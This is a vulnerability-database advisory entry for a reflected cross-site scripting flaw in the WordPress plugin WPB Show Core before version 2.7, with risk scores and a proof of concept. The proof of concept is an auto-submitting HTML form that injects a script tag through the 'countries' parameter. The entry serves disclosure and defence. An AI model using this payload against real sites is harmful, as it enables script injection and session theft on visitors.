Lucene search

K
wpexploitBob MatyasWPEX-ID:D7034AC2-0098-48D2-9BA9-87E09B178F7D
HistoryMar 18, 2024 - 12:00 a.m.

WPB Show Core < 2.7 - Reflected XSS

2024-03-1800:00:00
Bob Matyas
17
vulnerable plugin
html form
reflected xss
security exploit
input injections

6.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Description The plugin does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting

Open an HTML file containing the following:

```
<html>
  <body>
    <form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
      <input type="hidden" name="firstname" value="test" />
      <input type="hidden" name="lastname" value="test2" />    
      <input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
```

6.7 Medium

AI Score

Confidence

High

0.0004 Low

EPSS

Percentile

9.0%

Related for WPEX-ID:D7034AC2-0098-48D2-9BA9-87E09B178F7D